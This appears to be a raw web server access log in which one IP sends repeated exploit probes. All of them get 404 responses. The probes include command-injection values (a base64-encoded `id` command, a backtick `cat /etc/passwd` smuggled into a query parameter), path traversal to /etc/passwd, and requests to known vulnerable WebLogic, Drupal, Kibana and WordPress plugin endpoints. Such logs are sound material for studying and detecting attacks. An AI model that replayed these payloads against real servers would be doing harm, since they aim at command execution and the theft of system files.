137.220.197.141 - - [21/Jan/2024:13:20:35 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:20:58 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:21:01 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:21:09 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:21:23 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:21:44 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:21:46 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:24:23 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:24:25 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:24:27 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:25:00 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:25:28 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:25:28 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:25:31 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:25:33 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:25:35 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:25:55 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:26:18 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:26:20 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:26:20 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:26:48 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:26:50 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:27:03 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:27:05 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:27:07 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:27:42 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:27:51 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:27:55 +0100] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:28:16 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:28:18 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:28:20 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:29:13 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:29:16 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:29:18 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:29:19 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:29:32 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:29:44 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:29:57 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:30:36 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:30:41 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:30:46 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:30:57 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:30:58 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:31:09 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:31:21 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:31:33 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:31:35 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:31:37 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:31:39 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:03 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:04 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:16 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:18 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:20 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:22 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:22 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:25 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:48 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:50 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:32:54 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:33:08 +0100] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:33:08 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:33:10 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:33:12 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:33:14 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:33:36 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:33:55 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:34:31 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:34:42 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:34:58 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:34:58 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:35:04 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:35:54 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:36:20 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:37:51 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:38:44 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:38:46 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:38:51 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:39:28 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:39:34 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:39:52 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:06 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:16 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:18 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:24 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:48 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:48 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:56 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:58 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:58 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:40:58 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:00 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:00 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:00 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:02 +0100] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:08 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:20 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:34 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:42 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:55 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:55 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:41:57 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:42:59 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:43:13 +0100] "POST /node/1?_format=hal_json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:44:15 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:44:18 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:44:28 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:44:38 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:44:40 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:44:57 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:44:59 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:02 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:05 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:07 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:19 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:21 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:35 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:42 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:44 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
159.203.56.214 - - [21/Jan/2024:13:45:45 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:53 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:45:59 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:46:01 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:46:03 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:46:05 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:46:07 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:46:17 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:47:16 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:47:18 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:47:20 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:47:59 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:48:01 +0100] "POST /_async/AsyncResponseService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:48:03 +0100] "GET /_async/favicon.ico HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:48:10 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:48:12 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:49:14 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:49:16 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:49:18 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:49:20 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:50:27 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:50:47 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:50:49 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:50:51 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:50:53 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:51:17 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:01 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:03 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:07 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:09 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:16 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:18 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:24 +0100] "POST /adxmlrpc.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:26 +0100] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:36 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:52:49 +0100] "POST /service/extdirect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:53:44 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:53:46 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:54:01 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:54:02 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:54:04 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:54:19 +0100] "POST /photo/p/api/album.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:54:32 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:54:34 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:54:54 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:54:56 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:55:53 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:57:32 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:57:43 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:13:57:56 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
145.239.154.84 - - [21/Jan/2024:14:00:29 +0100] "GET / HTTP/1.1" 404 952
145.239.154.84 - - [21/Jan/2024:14:00:29 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:01:28 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:02:17 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:02:19 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:02:19 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:02:21 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:02:43 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:03:26 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:03:28 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:03:38 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:03:48 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:03:59 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:04:38 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:04:40 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:09 +0100] "GET /objects/getImage.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:11 +0100] "GET /objects/getImageMP4.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:13 +0100] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gY2xjZWsudHh0YA===&format=jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:15 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:15 +0100] "GET /objects/clcek.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:17 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:38 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:41 +0100] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20GeUeLuqeCi.txt%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:43 +0100] "GET /GeUeLuqeCi.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:06:50 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:13 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:15 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:21 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:33 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:35 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:43 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:44 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:46 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:49 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:51 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:55 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:07:57 +0100] "POST /content/2bECyqpH7XRbLff9wxhZ6ys7yXB.af.internalsubmit.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:08:14 +0100] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:08:16 +0100] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:09:04 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:09:17 +0100] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:10:51 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:10:53 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:11:12 +0100] "POST /api/timelion/run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:11:13 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:11:15 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:14:11:39 +0100] "GET /s/2bECyomPkHbutLiidob0enwMuZH/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 952
